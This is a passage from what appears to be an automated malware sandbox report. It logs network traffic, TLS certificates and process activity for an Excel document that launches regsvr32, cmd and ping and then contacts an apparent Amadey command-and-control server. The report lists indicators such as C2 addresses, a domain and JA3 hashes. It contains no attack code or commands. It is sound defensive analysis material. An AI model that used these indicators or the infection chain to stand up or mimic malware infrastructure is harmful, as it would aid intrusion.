Jun 9, 2021 15:21:38.244496107 CEST | 64267 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:38.294626951 CEST | 53 | 64267 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:38.999614000 CEST | 49448 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:39.059832096 CEST | 53 | 49448 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:39.159909964 CEST | 60342 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:39.210349083 CEST | 53 | 60342 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:40.534393072 CEST | 61346 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:40.584779024 CEST | 53 | 61346 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:42.137758970 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:42.198226929 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:43.285564899 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:43.346214056 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:45.533961058 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:45.584702015 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:49.907931089 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:49.958479881 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:51.077616930 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:51.183701038 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:51.218998909 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:51.277750969 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:51.637789011 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:51.717477083 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:52.668123007 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:52.742284060 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:53.718720913 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:53.776930094 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:55.219571114 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:55.279922962 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:55.392092943 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:55.444571972 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:55.776357889 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:55.835069895 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:56.973902941 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:57.028814077 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:57.771101952 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:57.822587013 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:59.385391951 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:59.440799952 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:59.850233078 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:59.908941984 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:05.187127113 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:05.240174055 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:06.356194973 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:06.411145926 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:07.310992002 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:07.364352942 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:08.822825909 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:08.872876883 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:10.216510057 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:10.277961016 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:12.805483103 CEST | 50010 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:12.879868031 CEST | 53 | 50010 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:33.340646982 CEST | 63718 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:33.401187897 CEST | 53 | 63718 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:35.480846882 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:35.617012978 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:36.693973064 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:36.752301931 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:37.430131912 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:37.571043968 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:37.991182089 CEST | 62208 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:38.050961018 CEST | 53 | 62208 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:38.482630014 CEST | 57574 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:38.550734043 CEST | 53 | 57574 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:38.699526072 CEST | 51818 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:38.760968924 CEST | 53 | 51818 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:39.343851089 CEST | 56628 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:39.405417919 CEST | 53 | 56628 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:39.908086061 CEST | 60778 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:39.969800949 CEST | 53 | 60778 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:40.793365002 CEST | 53799 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:40.852049112 CEST | 53 | 53799 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:41.757324934 CEST | 54683 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:41.818587065 CEST | 53 | 54683 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:42.288892984 CEST | 59329 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:42.350413084 CEST | 53 | 59329 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:50.255160093 CEST | 64021 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:50.318708897 CEST | 53 | 64021 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:00.317203999 CEST | 56129 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:00.378262997 CEST | 53 | 56129 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:16.410259008 CEST | 58177 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:16.469381094 CEST | 53 | 58177 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:34.410224915 CEST | 50700 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:34.482976913 CEST | 53 | 50700 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:35.993652105 CEST | 54069 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:36.063276052 CEST | 53 | 54069 | 8.8.8.8 | 192.168.2.6 |
ICMP Packets |
---|
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Jun 9, 2021 15:22:05.833841085 CEST | 192.168.2.6 | 8.8.7.7 | 4d5a | Echo | |
Jun 9, 2021 15:22:10.528872013 CEST | 192.168.2.6 | 8.8.7.7 | 4d59 | Echo | |
Jun 9, 2021 15:22:20.469414949 CEST | 192.168.2.6 | 8.8.7.7 | 4d58 | Echo | |
Jun 9, 2021 15:22:25.029455900 CEST | 192.168.2.6 | 8.8.7.7 | 4d57 | Echo | |
Jun 9, 2021 15:22:36.677659035 CEST | 192.168.2.6 | 8.8.7.7 | 4d56 | Echo | |
Jun 9, 2021 15:22:41.530548096 CEST | 192.168.2.6 | 8.8.7.7 | 4d55 | Echo |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jun 9, 2021 15:21:55.219571114 CEST | 192.168.2.6 | 8.8.8.8 | 0x9318 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jun 9, 2021 15:21:55.279922962 CEST | 8.8.8.8 | 192.168.2.6 | 0x9318 | No error (0) | 107.180.50.232 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jun 9, 2021 15:21:55.561739922 CEST | 107.180.50.232 | 443 | 192.168.2.6 | 49715 | CN=tpfcu.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Fri Mar 05 15:44:31 CET 2021 Tue May 03 09:00:00 CEST 2011 | Wed Apr 06 16:44:31 CEST 2022 Sat May 03 09:00:00 CEST 2031 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | |||||||
Jun 9, 2021 15:22:49.386614084 CEST | 18.117.84.120 | 443 | 192.168.2.6 | 49740 | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | Wed Jun 09 10:22:21 CEST 2021 | Thu Jun 09 10:22:21 CEST 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0 | 8916410db85077a5460817142dcbc8de |
Jun 9, 2021 15:23:25.363224030 CEST | 18.117.84.120 | 443 | 192.168.2.6 | 49747 | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | Wed Jun 09 10:22:21 CEST 2021 | Thu Jun 09 10:22:21 CEST 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0 | 8916410db85077a5460817142dcbc8de |
Jun 9, 2021 15:23:57.298791885 CEST | 18.117.84.120 | 443 | 192.168.2.6 | 49750 | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | CN=amadeamadey.at, OU=Amadey Org, O=Amadey TM, L=Bohn, ST=Bohn, C=AT | Wed Jun 09 10:22:21 CEST 2021 | Thu Jun 09 10:22:21 CEST 2022 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,5-10-11-13-35-23-65281,29-23-24,0 | 8916410db85077a5460817142dcbc8de |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 15:21:49 |
Start date: | 09/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x10000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:21:55 |
Start date: | 09/06/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe50000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:21:56 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:03 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7180e0000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:04 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61de10000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:04 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\PING.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff612a90000 |
File size: | 21504 bytes |
MD5 hash: | 6A7389ECE70FB97BFE9A570DB4ACCC3B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 15:22:13 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:17 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7180e0000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:18 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61de10000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:19 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\PING.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff612a90000 |
File size: | 21504 bytes |
MD5 hash: | 6A7389ECE70FB97BFE9A570DB4ACCC3B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 15:22:28 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:34 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7180e0000 |
File size: | 273920 bytes |
MD5 hash: | 4E2ACF4F8A396486AB4268C94A6A245F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 15:22:34 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61de10000 |
File size: | 625664 bytes |
MD5 hash: | EA777DEEA782E8B4D7C7C33BBF8A4496 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:35 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\PING.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff612a90000 |
File size: | 21504 bytes |
MD5 hash: | 6A7389ECE70FB97BFE9A570DB4ACCC3B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:43 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:44 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 15:22:51 |
Start date: | 09/06/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62a730000 |
File size: | 24064 bytes |
MD5 hash: | D78B75FC68247E8A63ACBA846182740E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Disassembly |
---|
Code Analysis |
---|